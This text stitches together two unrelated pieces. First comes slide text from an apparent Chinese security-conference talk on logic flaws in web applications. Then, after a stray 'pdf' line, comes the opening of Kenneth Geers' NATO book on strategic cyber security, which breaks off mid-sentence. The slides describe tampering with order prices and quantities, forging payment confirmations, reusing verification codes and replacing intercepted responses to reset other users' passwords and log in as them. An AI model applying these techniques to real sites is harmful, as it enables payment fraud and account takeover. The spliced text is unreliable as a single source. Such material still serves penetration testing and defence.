Web渗透测试之逻辑漏洞 挖掘 演讲嘉宾:hackbar 上海银基信息安全技术股份有限公司 简单VS复杂 1.思考 1.1、利用工具简单: 数据包抓取工具(Burpsuit、fiddler等) 1.2、思路复杂: 核心: 绕过真实用户身份或正常业务流程达到预期的目的 1.2.1、用户身份:认证 用户身份特性认证 本地认证 服务器端认证 1.2.2、业务流程:对业务的熟悉程度(各种类 型的网站、业务模式) 电信网厅业务清单图解 2、逻辑漏洞类型 支付漏洞 密码找回漏洞 任意用户登录漏洞 认证缺陷(弱认证、认证凭证获取) 接口枚举 越权(有条件的越权:空值绕过) 。。。。。。。 2.1、支付漏洞 2.1.1、支付漏洞突破口: 一、订单相关 1.选择商品时修改商品价格; 2.选择商品时将商品数量设为负数; 3.商品剩余1时,多人同时购买,是否产生冲突; 4.商品为0时是否还能购买; 5.生成订单时修改订单金额; 二、结算相关 1.优惠打折活动多次重复使用; 2.拦截数据包,修改订单金额; 3.拦截数据包,修改支付方式; 4.伪造虚假订单,刷单; 2.1.1、支付漏洞突破口: 三、支付相关 1.拦截数据包,伪造第三方确认信息; 2.保存用户付款信息被窃取; 四、退货相关 1、绕过商家确认直接退货; 2、绕过商品类型直接退货;(退货是否允许) 五、收货相关 1、绕过客户确认直接收货; 2.2、密码重置漏洞 用户密码找回方式: 手机验证码、邮箱、密保问题、自动生成新密码、密码找回链接 发送、 2.2.1、密码重置突破口: 认证凭证暴力破解 认证凭证回显 认证凭证重复使用 重新绑定 用户身份特性认证 服务器端认证 本地认证 密码找回流程绕过 。。。。。。。 2.3、任意用户登录 空密码绕过 身份替换 认证凭证篡改 。。。。。。。 2.4、认证缺陷漏洞 弱验证 空验证 认证凭证有效性&唯一性 2.5、越权漏洞 普通越权 未授权访问(登录凭证验证) 绕过授权模式(参数构造等) 2.6、接口枚举 业务接口因为没有做验证或者验证机制缺陷,容易遭到枚举攻击 撞库 订单、优惠券等遍历 3、案例分享 支付漏洞 任意用户密码重置漏洞 任意用户登录漏洞 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.1、支付漏洞 一分钱看电影 3.1.2支付漏洞 某商城任意积分 兑换 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够, 无法兑换: 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够, 无法兑换,但 是可以通过修 改数据包返回 值,让页面前 端显示兑换功 能键 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够, 无法兑换,但 是可以通过修 改数据包返回 值,让页面前 端显示兑换功 能键 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.5密码重置漏洞 绕过多重认证 3.2.5密码重置漏洞 绕过多重认证 首先找回自己 的账号00XXXX XX00密码 3.2.5密码重置漏洞 绕过多重认证 得到邮箱验 证码:044837 3.2.5密码重置漏洞 绕过多重认证 邮箱验证码04 4837可以重复 利用,用于账 号00XXXXXX99 密码找回: 3.2.5密码重置漏洞 绕过多重认证 邮箱验证码04 4837可以重复 利用,用于账 号00XXXXXX99 密码找回: 3.2.5密码重置漏洞 绕过多重认证 自己的账号00 XXXXXX00获取 到第二个邮箱 验证码,进入 下一步;提交 ,抓去数据包 ,获取正确的 response值。 3.2.5密码重置漏洞 绕过多重认证 然后再去进行 账号00XXXXXX 99的密码重置: 3.2.5密码重置漏洞 绕过多重认证 验证码随便乱 输入,提交, 抓去数据包, 替换response: 3.2.5密码重置漏洞 绕过多重认证 验证码随便乱 输入,提交, 抓去数据包, 替换response: 3.2.5密码重置漏洞 绕过多重认证 进入输入新密 码界面,输入 新密码: 3.2.5密码重置漏洞 绕过多重认证 密码重置成功: 3.2.5密码重置漏洞 绕过多重认证 登录验证: 3.3.1任意用户登录漏洞 空密码绕过 3.3.1任意用户登录漏洞 空密码绕过 3.3.1任意用户登录漏洞 空密码绕过 3.3.1任意用户登录漏洞 空密码绕过 3.3.2任意用户登录漏洞 认证凭证替换 3.3.2任意用户登录漏洞 认证凭证替换 3.3.2任意用户登录漏洞 认证凭证替换 3.3.2任意用户登录漏洞 认证凭证替换 谢谢!
pdf
© 2011 NATO Cooperative Cyber Defence Centre of Excellence, June 2011 All rights reserved. No part of this pub- lication may be reprinted, reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording or otherwise, without the prior written permission of the NATO Cooperative Cyber Defence Centre of Excellence. Publisher: CCD COE Publication Filtri tee 12, 10132 Tallinn, Estonia Tel: +372 717 6800 Fax: +372 717 6308 E-mail: ccdcoe@ccdcoe.org www.ccdcoe.org Print: OÜ Greif Trükikoda Design & Layout: Marko Söönurm Legal notice NATO Cooperative Cyber Defence Centre of Excellence assumes no responsibility for any loss or harm arising from the use of information contained in this book. ISBN 978-9949-9040-5-1 (print) ISBN 978-9949-9040-6-8 (epub) ISBN 978-9949-9040-7-5 (pdf) KENNETH GEERS STRATEGIC CYBER SECURITY NATO Cooperative Cyber Defence Centre of Excellence Abstract This book argues that computer security has evolved from a technical discipline to a strategic concept. The world’s growing dependence on a powerful but vulnerable Internet – combined with the disruptive capabilities of cyber attackers – now threat- ens national and international security. Strategic challenges require strategic solutions. The author examines four nation- state approaches to cyber attack mitigation. • Internet Protocol version 6 (Ipv6) • Sun Tzu’s Art of War • Cyber attack deterrence • Cyber arms control The four threat mitigation strategies fall into several categories. IPv6 is a technical solution. Art of War is military. The third and fourth strategies are hybrid: deter- rence is a mix of military and political considerations; arms control is a political/ technical approach. The Decision Making Trial and Evaluation Laboratory (DEMATEL) is used to place the key research concepts into an influence matrix. DEMATEL analysis demon- strates that IPv6 is currently the most likely of the four examined strategies to improve a nation’s cyber defense posture. There are two primary reasons why IPv6 scores well in this research. First, as a technology, IPv6 is more resistant to outside influence than the other proposed strategies, particularly deterrence and arms control, which should make it a more reliable investment. Second, IPv6 addresses the most significant advantage of cyber attackers today – anonymity. About the Author Kenneth Geers, PhD, CISSP, Naval Criminal Investigative Service (NCIS), is a Scientist and the U.S. Representative to the North Atlantic Treaty Organization Cooperative Cyber Defence Centre of Excellence (NATO CCD COE) in Tallinn, Estonia. To Jeanne 6 CONTENTS I. INTRODUCTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1. Cyber Security and National Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 THE NATURE AND SCOPE OF THIS BOOK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 RESEARCH OUTLINE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 II. BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 2. Cyber Security: A Short History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 THE POWER OF COMPUTERS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 THE RISE OF MALICIOUS CODE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 LONE HACKER TO CYBER ARMY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 NATIONAL SECURITY PLANNING . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28 MORE QUESTIONS THAN ANSWERS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31 3. Cyber Security: A Technical Primer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 CYBER SECURITY ANALYSIS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 CASE STUDY: SAUDI ARABIA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42 MODELING CYBER ATTACK AND DEFENSE IN A LABORATORY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 4. Cyber Security: Real-World Impact . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 CYBER SECURITY AND INTERNAL POLITICAL SECURITY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 CASE STUDY: BELARUS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 INTERNATIONAL CONFLICT IN CYBERSPACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 III. NATION-STATE CYBER ATTACK MITIGATION STRATEGIES . . . . . . . . . . . . . . . . . . . . . . . 87 5. Next Generation Internet: Is IPv6 the Answer? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 IPV6 ADDRESS SPACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 IMPROVED SECURITY? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 IPV6 ANSWERS SOME QUESTIONS, CREATES OTHERS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 PRIVACY CONCERNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91 UNEVEN WORLDWIDE DEPLOYMENT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92 DIFFERENCES OF OPINION REMAIN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94 6. Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? . . . . . . . . . . . . . . . . . . . 95 WHAT IS CYBER WARFARE? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 WHAT IS ART OF WAR? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96 STRATEGIC THINKING . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97 CULTIVATING SUCCESS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99 OBJECTIVE CALCULATIONS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 TIME TO FIGHT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 THE IDEAL COMMANDER . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 7 ART OF CYBER WAR: ELEMENTS OF A NEW FRAMEWORK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 7. Deterrence: Can We Prevent Cyber Attacks? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111 CYBER ATTACKS AND DETERRENCE THEORY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111 CYBER ATTACK DETERRENCE BY DENIAL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 CYBER ATTACK DETERRENCE BY PUNISHMENT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117 MUTUALLY ASSURED DISRUPTION (MAD) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121 8. Arms Control: Can We Limit Cyber Weapons? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123 CYBER ATTACK MITIGATION BY POLITICAL MEANS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123 THE CHEMICAL WEAPONS CONVENTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124 CWC: LESSONS FOR CYBER CONFLICT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125 TOWARD A CYBER WEAPONS CONVENTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127 THE CHALLENGES OF PROHIBITION AND INSPECTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130 IV. DATA ANALYSIS AND RESEARCH RESULTS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 9. DEMATEL and Strategic Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 DEMATEL INFLUENCING FACTORS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 NATIONAL SECURITY THREATS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 KEY CYBER ATTACK ADVANTAGES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135 CYBER ATTACK CATEGORIES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137 STRATEGIC CYBER ATTACK TARGETS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138 CYBER ATTACK MITIGATION STRATEGIES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 10. Key Findings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 142 THE “EXPERT KNOWLEDGE” MATRIX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 142 CAUSAL LOOP DIAGRAM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146 CALCULATING INDIRECT INFLUENCE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147 ANALYZING TOTAL INFLUENCE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150 V. CONCLUSION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155 11. Research contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155 SUGGESTIONS FOR FUTURE RESEARCH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156 VI. BIBLIOGRAPHY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158 8 Acknowledgements I would like to thank faith, hope, love, family, friends, NCIS, CCD CoE, TUT, my PhD advisor Professor emeritus Leo Võhandu, and Vana Tallinn. 9 Cyber Security and National Security I. INTRODUCTION 1. CYBER SECURITY AND NATIONAL SECURITY Cyber security has quickly evolved from a technical discipline to a strategic concept. Globalization and the Internet have given individuals, organizations, and nations incredible new power, based on constantly developing networking technology. For everyone – students, soldiers, spies, propagandists, hackers, and terrorists – infor- mation gathering, communications, fund-raising, and public relations have been digitized and revolutionized. As a consequence, all political and military conflicts now have a cyber dimension, the size and impact of which are difficult to predict, and the battles fought in cyber- space can be more important than events taking place on the ground. As with ter- rorism, hackers have found success in pure media hype. As with Weapons of Mass Destruction (WMD), it is difficult to retaliate against an asymmetric attack. The astonishing achievements of cyber espionage serve to demonstrate the high return on investment to be found in computer hacking. The start-up cost is low, and traditional forms of espionage, such as human intelligence, are more dangerous. Computer hacking yields free research and development data and access to sensitive communications. National leaders, who frequently address cyber espionage on the world stage, are worried.1 The use and abuse of computers, databases, and the networks that connect them to achieve military objectives was known in the early 1980s in the Soviet Union as the Military Technological Revolution (MTR). After the 1991 Gulf War, the Pentagon’s Revolution in Military Affairs was almost a household term.2 A cyber attack is not an end in itself, but a powerful means to a wide variety of ends, from propaganda to espionage, from denial of service to the destruction of critical infrastructure. The nature of a national security threat has not changed, but the Internet has provided a new delivery mechanism that can increase the speed, scale, and power of an attack. Dozens of real world examples, from the U.S. to Russia, from the Middle East to the Far East, prove that the ubiquity and vulnerability of the Internet have tangible po- litical and military ramifications. As the Internet becomes more powerful and as our dependence upon it grows, cyber attacks may evolve from a corollary of real-world disputes to play a lead role in future conflicts. 1 Spiegel, 2007; Cody, 2007. 2 Mishra, 2003. 10 INTRODUCTION In 1948, Hans Morgenthau wrote that national security depends on the integrity of a nation’s borders and its institutions.3 In 2011, military invasion and terrorist attack remain the most certain way to threaten the security of an adversary. However, as national critical infrastructures, including everything from elections to electricity, are computerized and connected to the Internet, national security planners will also have to worry about cyber attacks. It is a fact that large, complex infrastructures are easier to manage with comput- ers and common operating systems, applications, and network protocols. But this convenience comes at a price. Connectivity is currently well ahead of security, and this makes the Internet, and Internet users, vulnerable to attack. There are not only more devices connected to the Internet every day, but there are dozens of additions to the Common Vulnerabilities and Exposures (CVE) database each month.4 These combine to create what hackers call the expanding “attack surface.” Hackers tend to be creative people, and they are able to exploit such complexity to find ways to read, delete, and/or modify information without proper authorization. One paradox of the cyber battlefield is that both big and small players have advan- tages. Nations robust in IT exploit superior computing power and bandwidth; small countries and even lone hackers exploit the amplifying power of the Internet to attack a stronger conventional foe. Furthermore, Internet-dependent nations are a tempting target because they have more to lose when the network goes down. In cyber conflict, the terrestrial distance between adversaries can be irrelevant because everyone is a next-door neighbor in cyberspace. Hardware, software, and bandwidth form the landscape, not mountains, valleys, or waterways. The most powerful weapons are not based on strength, but logic and innovation. It is also true that cyber attacks are constrained by the limited terrain of cyberspace. There are many skeptics of cyber warfare. Basically, tactical victories amount to a successful reshuffling of the bits – the ones and zeros – inside a computer. Then the attacker must wait to see if anything happens in the real world. There is no guar- antee of success. Network reconfiguration, software updates, and human decision- making change cyber terrain without warning, and even a well-planned attack can fall flat.5 In fact, the dynamic nature of the Internet offers benefits to both an attacker and a defender. Many cyber battles will be won by the side that uses cutting-edge tech- nologies to greater advantage. Although an attacker has more targets to strike and 3 Morgenthau, 1948. 4 CVE, 2011. 5 Parks & Duggan, 2001. 11 Cyber Security and National Security more ways to hit them, a defender has the means to design an ever-increasing level of network redundancy and survivability.6 In 2011, an attacker’s most important advantage remains a degree of anonymity. Smart hackers hide within the international, maze-like architecture of the Internet. They route attacks through countries with which a victim’s government has poor diplomatic relations or no law enforcement cooperation. In theory, even a major cyber conflict could be fought against an unknown adversary. Law enforcement and counterintelligence investigations suffer from the fact that the Internet is an international entity, and jurisdiction ends every time a telecom- munications cable crosses a border. In the case of a state-sponsored cyber attack, international cooperation is naturally non-existent. The anonymity or “attribution” problem is serious enough that it increases the odds that damaging cyber attacks on national critical infrastructures will take place in the absence of any traditional, real-world warning, during times of nominal peace. Cyber defense suffers from the fact that traditional security skills are of marginal help in defending computer networks, and it is difficult to retain personnel with marketable technical expertise. Talented computer scientists prefer more exciting, higher-paying positions elsewhere. As a consequence, at the technical level, it can be difficult even knowing whether one is under cyber attack. At the political level, the intangible nature of cyberspace can make the calculation of victory, defeat, and battle damage a highly subjective undertaking. And with cyber law, there is still not enough expertise to keep pace with the threat. Finally, cyber defense suffers from the fact that there is little moral inhibition to computer hacking, which relates primarily to the use and abuse of computer code. So far, there is little perceived human suffering. All things considered, the current balance of cyber power favors the attacker. This stands in contrast to our historical understanding of warfare, in which the defender has traditionally enjoyed a home field advantage. Therefore, many governments may conclude that, for the foreseeable future, the best cyber defense is a good offense. First, cyber attacks may be required to defend the homeland; second, they are a powerful and sometimes deniable way to project national power. 6 Lewis, 2002. 12 INTRODUCTION Can a cyber attack pose a serious threat to national security? Decision makers are still unsure. Case studies are few in number, much information lies outside the pub- lic domain, there have been no wars between two first-class militaries in the Inter- net era, and most organizations are still unsure about the state of their own cyber security. Conducting an “information operation” of strategic significance is not easy, but neither is it impossible. During World War II, the Allies took advantage of having broken the Enigma cipher to feed false information to Adolf Hitler, signaling that the D-Day invasion would take place at Pas-de-Calais and not Normandy. This gave Allied forces critical time to establish a foothold on the continent and change the course of history.7 What military officers call the “battlespace” grows more difficult to define – and to defend – over time. Advances in technology are normally evolutionary, but they can be revolutionary – artillery reached over the front lines of battle; rockets and airplanes crossed national boundaries; today cyber attacks can target political lead- ership, military systems, and average citizens anywhere in the world, during peace- time or war, with the added benefit of attacker anonymity. Narrowly defined, the Internet is just a collection of networked computers. But the importance of “cyberspace” as a concept grows every day. The perceived threat is such that the new U.S. Cyber Command has declared cyberspace to be a new domain of warfare,8 and the top three priorities at the U.S. Federal Bureau of Investigation (FBI) are preventing terrorism, espionage, and cyber attacks.9 Cyber warfare is unlike traditional warfare, but it shares some characteristics with the historical role of aerial bombardment, submarine warfare, special operations forces, and even assassins. Specifically, it can inflict painful, asymmetric damage on an adversary from a distance or by exploiting the element of surprise.10 The post-World War II U.S. Strategic Bombing Survey (USSBS) may hold some les- sons for cyber war planners. The USSBS concluded that air power did not perma- nently destroy any indispensable adversary industry during the war, and that “per- sistent re-attack” was always necessary. Nonetheless, the report left no doubt about its ultimate conclusion: 7 Kelly, 2011. 8 “Cyber Command’s strategy...” 2011. 9 From the FBI website: www.fbi.gov. 10 Parks & Duggan, 2001. 13 Cyber Security and National Security ... Allied air power was decisive in the war in Western Europe ... In the air, its victory was complete. At sea, its contribution ... brought an end to the enemy’s greatest naval threat – the U-boat; on land, it helped turn the tide overwhelmingly in favor of Allied ground forces.11 Cyber attacks are unlikely to have the lethality of a strategic bomber, at least for the foreseeable future. But in the end, the success of military operations is effects- based. If both a ballistic missile and a computer worm can destroy or disable a target, the natural choice will be the worm. In May 2009, President Obama made a dramatic announcement: “Cyber intruders have probed our electrical grid ... in other countries, cyber attacks have plunged entire cities into darkness.”12 Investigative journalists subsequently concluded that these attacks took place in Brazil, affecting millions of civilians in 2005 and 2007, and that the source of the attacks is still unknown.13 National security planners should consider that electricity has no substitute, and all other infrastructures, in- cluding computer networks, depend on it.14 In 2010, the Stuxnet computer worm may have accomplished what five years of United Nations Security Council resolutions could not: disrupt Iran’s pursuit of a nuclear bomb.15 If true, a half-megabyte of computer code quietly substituted for air strikes by the Israeli Air Force. Moreover, Stuxnet may have been more effective than a conventional military attack and may have avoided a major international cri- sis over collateral damage. To some degree, the vulnerability of the Internet to such spectacular attacks will provide a strong temptation for nation-states to take advan- tage of computer hacking’s perceived high return-on-investment before it goes away. If cyber attacks play a lead role in future wars, and the fight is largely over owner- ship of IT infrastructure, it is possible that international conflicts will be shorter and cost fewer lives. A cyber-only victory could facilitate post-war diplomacy, economic recovery, and reconciliation. Such a war would please history’s most famous mili- tary strategist, Sun Tzu, who argued that the best leaders can attain victory before combat is necessary.16 It may be unlikely, however, that an example like Stuxnet will occur frequently. Mod- ern critical infrastructures present complex, diverse, and distributed targets. They 11 United States Strategic Bombing Survey, 1945. 12 “Remarks by the President...” 2009. 13 “Cyber War...” 2009. 14 Divis, 2005. 15 Falkenrath, 2011. 16 Sawyer, 1994. 14 INTRODUCTION comprise not one system, technology, or procedure, but many and are designed to survive human failings and even natural disasters. Engineers on-site may see the start of an attack and neutralize it before it becomes a serious threat. In short, computer vulnerabilities should not be confused with vulnerabilities in whole infra- structures.17 Cyber attacks may rise to the level of a national security threat only when an adver- sary has invested a significant amount of time and effort into a creative and well- timed strike on a critical infrastructure target such as an electrical grid, financial system, air traffic control, etc. Air defense is an example of a system that plays a strategic role in national security and international relations. It may also represent a particular cyber vulnerability in the context of a 